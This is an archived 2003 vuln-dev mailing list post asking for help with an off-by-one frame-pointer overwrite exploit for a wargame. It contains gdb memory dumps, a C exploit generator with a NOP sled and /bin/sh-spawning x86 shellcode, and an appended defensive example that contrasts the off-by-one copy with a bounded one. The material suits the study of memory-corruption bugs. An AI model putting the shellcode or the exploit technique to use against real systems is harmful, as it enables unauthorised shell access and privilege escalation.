Vulnerability Development mailing list archives

Illegal Instruction and Frame pointer overwriting


From: joe <moj0e () terra com br>
Date: Wed, 24 Sep 2003 09:19:14 -0300

Hello! It is great to have such a mailing list as this! It's not too hot and not too cold!! It's just right!!
Anyway...
I am having a problem developing an exploit for a wargame.
The vuln is just like the one on:

http://www.phrack.org/phrack/55/P55-08


I even use the exploit provided, since the vuln is almost identical to the one on the wargame. I am able to overwrite the last byte of EBP (I realize it adds 4 to it) and make it point to an address that will take me to the NOPs. From there it travels up the memory until it hits a certain address and causes an ILLEGAL INSTRUCTION (at least it doesn't segfault).

It tries to execute instruction 0xf798bfff, which doesn't look right to me.


(I am using Mandrake 9.1 on an x86.) The vuln was compiled with gcc v2.9 or something... the one that makes it possible to exploit this kind of vuln. I am able to check execution flow by examining the memory (using the x command in gdb).
So I know that I am actually going to where I want (or think I want) to go.

Any help is gratefully accepted! Attached is the exploit.

Here is some gdb output for you to chew on:

(no debugging symbols found)...
(gdb) run `./xp15`
Breakpoint 1, 0x08048555 in main ()
(gdb) info reg esp
esp            0xbffff78c       0xbffff78c
(gdb) x 0xbffff78c
0xbffff78c:     0xbffff710
(gdb) x 0xbffff710
0xbffff710:     0x90909090
(gdb) c
Continuing.

Program received signal SIGILL, Illegal instruction.
0xbffff776 in ?? ()
(gdb) x 0xbffff776
0xbffff776:     0xf798bfff
(gdb) x/100 0xbffff700
0xbffff700:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff710:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff720:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff730:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff740:     0x90909090      0x90909090      0x90909090      0x24eb9090
0xbffff750:     0x891e8d5e      0xd2330b5e      0x89075689      0x1bb80f56
0xbffff760:     0x35123456      0x12345610      0x4006d57d      0x40155f50
0xbffff770:     0x40012780      0xbffff804      0xbffff798      0x40077eb2
0xbffff780:     0x40154360      0x08048660      0xbffff7a4      0xbffff710
0xbffff790:     0x88888888      0x40155f50      0xbffff788      0x08048551
0xbffff7a0:     0x08048660      0xbffff804      0xbffff7b8      0x400508d9
0xbffff7b0:     0x40031038      0x40155f50      0xbffff7d8      0x4003b7f7
0xbffff7c0:     0x00000002      0xbffff804      0xbffff810      0x40012c10
0xbffff7d0:     0x00000002      0x08048380      0x00000000      0x080483a1
0xbffff7e0:     0x080484b0      0x00000002      0xbffff804      0x080482e0
0xbffff7f0:     0x08048590      0x4000abf0      0xbffff7fc      0x40012de0
0xbffff800:     0x00000002      0xbffff947      0xbffff961      0x00000000
0xbffff810:     0xbffffa63      0xbffffa76      0xbffffa85      0xbffffa96
0xbffff820:     0xbffffaa8      0xbffffac0      0xbffffacb      0xbffffadb
0xbffff830:     0xbffffae9      0xbffffb03      0xbffffb14      0xbffffb1d
0xbffff840:     0xbffffcfb      0xbffffd0e      0xbffffd1c      0xbffffd3c
0xbffff850:     0xbffffd67      0xbffffd80      0xbffffdfb      0xbffffe0d
0xbffff860:     0xbffffe19      0xbffffe35      0xbffffe44      0xbffffe5c
0xbffff870:     0xbffffe6d      0xbffffe82      0xbffffe9d      0xbffffed2
0xbffff880:     0xbffffedd      0xbffffef2      0xbfffff09      0xbfffff11
(gdb)
(gdb)quit
[blurb@wargame]$ fortune
"The major difference between a thing that might go wrong
and a thing that cannot possibly go wrong is that when a
thing that cannot possibly go wrong goes wrong it usually
turns out to be impossible to get at or repair."

-- One of the laws of computers and programming revealed.
[blurb@wargame]$
#include <stdio.h>
#include <string.h>
#include <unistd.h>

char sc_linux[] =
/* Alternative shellcode, commented out (not in use):
"\x31\xdb"
"\x89\xd8"
"\xb0\x17"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x2e"
"\xcd\x80"
"\x31\xc0"
"\x50"
"\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x31\xd2"
"\xb0\x0b"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x01"
"\xcd\x80";
*/
/* Original shellcode (in use) */
    "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
    "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
    "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
    "\xd7\xff\xff\xff/bin/sh";

int main(void)
{
    int i, j, t;
    char buffer[1024];

    memset(buffer, 0, sizeof(buffer));

    /* NOP sled */
    for (i = 0; i <= (252 - sizeof(sc_linux) - 20); i++)
        buffer[i] = 0x90;

    /* shellcode, without its terminating NUL */
    for (j = 0; j < (sizeof(sc_linux) - 1); i++, j++)
        buffer[i] = sc_linux[j];

    /* four copies of 0xbffff710 (little-endian): address of our buffer */
    for (t = 0; t < 4; t++) {
        buffer[i++] = 0x10;
        buffer[i++] = 0xf7;
        buffer[i++] = 0xff;
        buffer[i++] = 0xbf;
    }

    /* overflow chars */
    for (t = 0; t < 9; t++)
        buffer[i++] = 0x88;

    printf("%s", buffer);
    //execl("./15", "./15", buffer, NULL);

    return 0;
}
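As an added example (not code from the post, from the Phrack article, or from the wargame), here is a small C model of the bug class behind the post: a copy loop whose bound check is off by one, so it writes exactly one byte past a 256-byte local buffer, shown beside the correctly bounded version. On an x86 stack the byte past the buffer is the least-significant byte of the saved frame pointer, so the model places a 4-byte saved frame pointer directly after the buffer and checks whether it survived the copy. BUF_SIZE, the function names and the sample values (0xbffff788 as the saved frame pointer, 0x10 as the stray byte) are assumptions; the values are borrowed from the post's dump only so the result is recognizable.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the post or from Phrack 55-08. BUF_SIZE,
 * all names and the sample values are assumptions made for the example. */

#define BUF_SIZE 256

/* Constructed stand-in for a stack frame: the local buffer followed
 * directly by the 4-byte saved frame pointer. Keeping both in one array
 * makes the one-past-the-end write well-defined C, so the effect can be
 * observed without depending on the real stack layout. */
struct frame {
    unsigned char bytes[BUF_SIZE + sizeof(uint32_t)];
};

static void frame_init(struct frame *f, uint32_t saved_fp)
{
    memset(f->bytes, 0, sizeof f->bytes);
    memcpy(f->bytes + BUF_SIZE, &saved_fp, sizeof saved_fp);
}

static uint32_t frame_saved_fp(const struct frame *f)
{
    uint32_t v;
    memcpy(&v, f->bytes + BUF_SIZE, sizeof v);
    return v;
}

typedef void copy_fn(unsigned char *dst, size_t dst_size,
                     const unsigned char *src, size_t len);

/* Vulnerable: "i <= dst_size" lets i reach dst_size, so dst[dst_size],
 * the first byte after the buffer, is written. */
static void copy_off_by_one(unsigned char *dst, size_t dst_size,
                            const unsigned char *src, size_t len)
{
    for (size_t i = 0; i < len && i <= dst_size; i++)  /* bug: should be < */
        dst[i] = src[i];
}

/* Hardened: strict bound, dst[dst_size] is never written. */
static void copy_bounded(unsigned char *dst, size_t dst_size,
                         const unsigned char *src, size_t len)
{
    for (size_t i = 0; i < len && i < dst_size; i++)
        dst[i] = src[i];
}

/* Runs 'copy' with a BUF_SIZE+1 byte input against a fresh frame and
 * returns the saved frame pointer afterwards. The starting value
 * 0xbffff788 and the trailing byte 0x10 mirror numbers in the post. */
uint32_t saved_fp_after(copy_fn *copy)
{
    struct frame f;
    unsigned char input[BUF_SIZE + 1];   /* one byte longer than the buffer */

    frame_init(&f, 0xbffff788u);
    memset(input, 0x90, sizeof input);
    input[BUF_SIZE] = 0x10;  /* the one byte that can land past the buffer */
    copy(f.bytes, BUF_SIZE, input, sizeof input);
    return frame_saved_fp(&f);
}

/* 1 when the saved frame pointer survived the copy unchanged. Comparing a
 * value that must not change is the same idea a stack canary relies on. */
int frame_intact(copy_fn *copy)
{
    return saved_fp_after(copy) == 0xbffff788u;
}

int main(void)
{
    printf("off-by-one copy: saved fp = 0x%08x (intact: %d)\n",
           (unsigned)saved_fp_after(copy_off_by_one),
           frame_intact(copy_off_by_one));
    printf("bounded copy:    saved fp = 0x%08x (intact: %d)\n",
           (unsigned)saved_fp_after(copy_bounded),
           frame_intact(copy_bounded));
    return 0;
}
```

Build with `cc -o frame frame.c && ./frame`. On a little-endian host the off-by-one run reports 0xbffff710 (only the low byte changed, exactly the single-byte frame redirection the post describes), while the bounded copy leaves 0xbffff788 untouched; the `frame_intact` check is the kind of invariant a compiler's stack protector enforces at function return.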